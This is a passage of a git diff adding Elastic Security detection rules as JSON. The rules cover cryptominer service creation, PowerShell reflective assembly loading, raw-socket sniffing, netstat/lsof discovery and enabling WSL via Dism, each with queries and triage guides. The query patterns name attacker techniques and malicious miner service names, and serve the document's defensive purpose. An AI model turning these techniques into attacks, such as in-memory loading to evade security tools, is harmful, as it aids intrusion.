"https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e1db8899-97c1-4851-8993-3a3265353601_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json new file mode 100644 index 00000000000..34b3ea479d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Mining Process Creation Event", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and event.action : (\"creation\", \"file_create_event\") and \nfile.name : (\"aliyun.service\", \"moneroocean_miner.service\", \"c3pool_miner.service\", \"pnsd.service\", \"apache4.service\", \"pastebin.service\", \"xvf.service\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2258f48-ba75-4248-951b-7c885edf18c2", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "e2258f48-ba75-4248-951b-7c885edf18c2_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json new file mode 100644 index 00000000000..75905987429 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious .NET Reflection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and\n not powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and\n not (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n file.name : \"PathFunctions.ps1\"\n ) and\n not file.path : C\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Monitoring?Agent\\\\\\\\Agent\\\\\\\\Health?Service?State\\\\\\\\Monitoring?Host?Temporary?Files*\\\\\\\\AvailabilityGroupMonitoring.ps1 and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1620", + "name": "Reflective Code Loading", + "reference": "https://attack.mitre.org/techniques/T1620/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 112 + }, + "id": "e26f042e-c590-4e82-8e05-41e81bd822ad_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json new file mode 100644 index 00000000000..236d8d3c700 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_212.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files*\\\\AvailabilityGroupMonitoring.ps1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious .NET Reflection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and\n not powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and\n not (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n file.name : \"PathFunctions.ps1\"\n ) and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1620", + "name": "Reflective Code Loading", + "reference": "https://attack.mitre.org/techniques/T1620/" + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.001", + "name": "Dynamic-link Library Injection", + "reference": "https://attack.mitre.org/techniques/T1055/001/" + }, + { + "id": "T1055.002", + "name": "Portable Executable Injection", + "reference": "https://attack.mitre.org/techniques/T1055/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "e26f042e-c590-4e82-8e05-41e81bd822ad_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json b/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json new file mode 100644 index 00000000000..a6d60cb85ee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e28b8093-833b-4eda-b877-0873d134cf3c_2.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the ability of a process to be able to create RAW and PACKET socket types for the available network namespaces by a non-root user. A malicious process with this capability may exploit routing between hosts, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. The CAP_NET_RAW capability allows the process to bind to any address within the available namespaces, which allows network traffic sniffing by a non root user. The rule identifies previously unknown processes executing with CAP_NET_RAW capabilities through the use of the new terms rule type.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Network Traffic Capture via CAP_NET_RAW", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "event.category:\"process\" and host.os.type:\"linux\" and event.type:\"start\" and event.action:\"exec\" and process.name:* and\n(process.thread.capabilities.effective:\"CAP_NET_RAW\" or process.thread.capabilities.permitted:\"CAP_NET_RAW\") and\nnot user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e28b8093-833b-4eda-b877-0873d134cf3c", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1040", + "name": "Network Sniffing", + "reference": "https://attack.mitre.org/techniques/T1040/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "e28b8093-833b-4eda-b877-0873d134cf3c_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json new file mode 100644 index 00000000000..83c2faf9935 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may attempt to get a listing of network connections to or from a compromised system.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "System Network Connections Discovery", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"netstat\", \"lsof\", \"who\", \"w\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e2dc8f8c-5f16-42fa-b49e-0eb8057f7444_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json new file mode 100644 index 00000000000..38c0f64b4a1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2e0537d-7d8f-4910-a11d-559bcf61295a_7.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to enable the Windows Subsystem for Linux using Microsoft Dism utility. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Enabled via Dism Utility", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Enabled via Dism Utility\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies attempts to enable WSL using the Dism utility. It monitors for the execution of Dism and checks if the command line contains the string \"Microsoft-Windows-Subsystem-Linux\". \n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and WSL is homologated and approved in the environment.\n\n### Related Rules\n\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Windows Subsystem for Linux Distribution Installed - a1699af0-8e1e-4ed0-8ec1-89783538a061\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- 